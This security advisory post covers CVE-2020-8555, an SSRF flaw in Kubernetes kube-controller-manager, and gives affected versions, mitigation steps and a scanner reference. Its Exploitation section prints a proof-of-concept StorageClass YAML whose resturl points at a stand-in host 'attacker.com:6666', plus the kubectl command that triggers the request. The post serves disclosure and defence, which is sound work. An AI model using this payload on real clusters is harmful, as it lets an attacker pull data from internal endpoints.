Kubernetes Kube-Controller-Manager Server Side Request Forgery (SSRF) Vulnerability

Summary:

Kubernetes is an open source container orchestration system for automating application deployment, management and scaling. A security flaw was discovered and disclosed on June 1, 2020 in Kubernetes . A Server Side Request Forgery (SSRF) vulnerability exists in kube-controller-manager. The vulnerability allows an attacker to users to leak up to 500 bytes of arbitrary information from unprotected endpoints within the master’s host network.This issue was assigned under CVE-2020-8555.

Description:

An attacker with permissions to to create a pod with certain built-in Volume types (GlusterFS, Quobyte, StorageFS, ScaleIO) or permissions to create a StorageClass creates a pod and attaches a volume to the pod. This volume can be one of the certain built-in Volume types like GlusterFS, Quobyte, StorageFS, ScaleIO etc. By using the volume attachment or storage class creation, the attacker makes kube-controller-manager k8s component to make GET or POST requests without an attacker-controlled request body from the host network that allows to leak some arbitrary information from unprotected endpoints.

Affected Products:

kube-controller-manager v1.18.0
kube-controller-manager v1.17.0 – v1.17.4
kube-controller-manager v1.16.0 – v1.16.8
kube-controller-manager < v1.15.11

Exploitation:

During a Volume creation /volumes was appended at the end of the user provided URL in resturl parameter, # trick was used in order to remove the end of this unwanted path.

YAML payload used for the half-blind SSRF vulnerability:

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: poc-ssrf
spec:
accessModes:
- ReadWriteOnce
volumeMode: Filesystem
resources:
requests:
storage: 8Gi
storageClassName: poc-ssrf

The kube controller manager handled the creation process and triggered the HTTP resulting request

kubectl create -f sc-poc.yaml


       Received request from attacker point of view

Image Source: medium.com/@BreizhZeroDayHunters/when-its-not-only-about-a-kubernetes-cve-8f6b448eafa8

Please visit here for more details about the vulnerability.

Mitigation:

Vendor has officially released their official Advisory to patch the vulnerability. To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster.

As per Advisory, Prior to upgrading, this vulnerability can also be  mitigated by adding some endpoint protections on the master or restricting usage of the vulnerable volume types and restricting StorageClass write permissions through RBAC .

Qualys customers can scan their network with QID(s)#48047 to detect  the assets. Please continue to follow on Qualys Threat Protection for more coverage on these vulnerabilities.

References and Sources:

https://github.com/kubernetes/kubernetes/issues/91542

https://medium.com/@BreizhZeroDayHunters/when-its-not-only-about-a-kubernetes-cve-8f6b448eafa8

Leave a Reply

Your email address will not be published. Required fields are marked *